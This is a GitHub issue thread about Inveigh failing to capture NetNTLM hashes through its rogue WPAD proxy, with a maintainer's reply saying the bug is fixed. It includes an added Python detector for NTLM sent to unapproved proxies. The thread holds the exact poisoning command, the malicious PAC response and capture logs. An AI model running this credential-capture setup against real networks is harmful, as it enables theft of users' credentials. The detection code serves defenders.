Proxy auth but NTLM hash not captured
Closed this issue · 2 comments
Hello Kevin,
First I would like to thank you for such a great tool.
I'm running Inveigh on the "attacker" machine (192.168.100.101) from an elevated shell using these parameters:
Invoke-Inveigh -IP 192.168.100.101 -ConsoleOutput Y -Proxy Y -WPADAuth Anonymous
In the victim machine (192.168.100.23) sniffing traffic with Wireshark I see the Inveigh host WPAD response:
function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; PROXY 192.168.100.101:8493; DIRECT";}
After that I'm seeing the target browser initiating a request through the proxy, receiving a 407 Unauthorized and executing the challenge response process:
CONNECT www.google.es:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Content-Length: 0
Proxy-Authorization: NTLM [REDACTED]
Pragma: no-cache
Host: www.google.es
HTTP/1.1 407 Unauthorized
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 09 Apr 2020 18:57:52 GMT
Content-Length: 0
Proxy-Authenticate: NTLM [REDACTED]
Content-Type: text/html
CONNECT www.google.es:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Content-Length: 0
Host: www.google.es
Pragma: no-cache
Proxy-Authorization: NTLM [REDACTED]
The console output is confirming the Wireshark output captured at the victim machine:
[+] [2020-04-09T18:57:51] LLMNR request for wpad received from 192.168.100.23 [response sent]
[+] [2020-04-09T18:57:51] TCP(80) SYN packet detected from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) GET request for /wpad.dat received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) host header wpad received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) user agent received from 192.168.100.23:59790:
Mozilla/4.0 (compatible; MSIE 7.0; Win32)
[+] [2020-04-09T18:57:51] TCP(8492) SYN packet detected from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) CONNECT request for www.google.es:443 received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) host header www.google.es received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) user agent received from 192.168.100.23:59791:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
[+] [2020-04-09T18:57:52] TCP(8492) SYN packet detected from 192.168.100.23:59792
[+] [2020-04-09T18:57:52] TCP(8493) SYN packet detected from 192.168.100.23:59793
[+] [2020-04-09T18:57:55] TCP(8493) SYN packet detected from 192.168.100.23:59793
Why is Inveigh not able to get the NetNTLM hash?
Thanks in advance!
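The exchange above (WPAD-served proxy, 407, NTLM in Proxy-Authorization) is also what a defender wants to spot: a client authenticating with NTLM to a proxy that is not the organization's. The following is an added detection example, not code from the issue or from Inveigh; it assumes captured HTTP requests tagged with the proxy endpoint they were sent to, an approved-proxy allowlist, and constructed NTLMSSP messages that mirror the CONNECT request above (the AUTHENTICATE sample carries only domain and user, no challenge responses).

```python
import base64
import struct
NTLM_TYPES = {1: "NEGOTIATE", 2: "CHALLENGE", 3: "AUTHENTICATE"}

def decode_ntlm(header_value):
    """Decode an 'NTLM <base64>' credential; returns (message type, name fields)."""
    scheme, _, b64 = header_value.strip().partition(" ")
    raw = base64.b64decode(b64) if scheme.upper() == "NTLM" else b""
    if raw[:8] != b"NTLMSSP\x00" or len(raw) < 12:
        return None, {}
    msg_type, info = struct.unpack_from("<I", raw, 8)[0], {}
    if msg_type == 3 and len(raw) >= 64:  # AUTHENTICATE: who answered the 407
        enc = "utf-16-le" if struct.unpack_from("<I", raw, 60)[0] & 1 else "ascii"
        for name, off in (("domain", 28), ("user", 36)):  # Len, MaxLen, Offset
            ln, _, start = struct.unpack_from("<HHI", raw, off)
            info[name] = raw[start:start + ln].decode(enc, "replace")
    return msg_type, info

def audit_proxy_traffic(requests, approved_proxies):
    """requests: (proxy endpoint, raw HTTP request) pairs; flags NTLM sent elsewhere."""
    alerts = []
    for endpoint, raw in requests:
        lines = raw.partition("\r\n\r\n")[0].split("\r\n")
        headers = {k.strip().lower(): v.strip()
                   for k, _, v in (line.partition(":") for line in lines[1:])}
        auth = headers.get("proxy-authorization")
        if not auth or endpoint in approved_proxies:
            continue
        msg_type, info = decode_ntlm(auth)
        if msg_type is not None:
            alerts.append({"proxy": endpoint, "request": lines[0],
                           "ntlm": NTLM_TYPES.get(msg_type, "UNKNOWN"), **info})
    return alerts

# Constructed sample: a bare NEGOTIATE, and an AUTHENTICATE with empty response fields.
NEGOTIATE = b"NTLMSSP\x00" + struct.pack("<I", 1) + bytes(20)

def _authenticate(domain, user):
    d, u = domain.encode("utf-16-le"), user.encode("utf-16-le")
    hdr = b"NTLMSSP\x00" + struct.pack("<I", 3) + struct.pack("<HHI", 0, 0, 64) * 2
    hdr += struct.pack("<HHI", len(d), len(d), 64)            # DomainNameFields
    hdr += struct.pack("<HHI", len(u), len(u), 64 + len(d)) + bytes(16)  # UserName, rest
    return hdr + struct.pack("<I", 1) + d + u                 # NegotiateFlags: UNICODE

def _request(blob):  # mirrors the CONNECT in the issue
    return ("CONNECT www.google.es:443 HTTP/1.0\r\nHost: www.google.es\r\n"
            "Proxy-Authorization: NTLM %s\r\n\r\n" % base64.b64encode(blob).decode())
SAMPLE = [("192.168.100.101:8492", _request(NEGOTIATE)),
          ("192.168.100.101:8492", _request(_authenticate("CORP", "jdoe"))),
          ("10.0.0.5:3128", _request(_authenticate("CORP", "jdoe")))]
```

Running `audit_proxy_traffic(SAMPLE, {"10.0.0.5:3128"})` reports the two messages sent to 192.168.100.101:8492 and, for the AUTHENTICATE, names the account that answered the challenge, which is the fact an incident responder needs first.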
Same options with Inveigh 1.4 are working like a charm.
Thanks! When I merged the NTLM code between SMB and HTTP, I failed to include proxy traffic. I pushed the fix.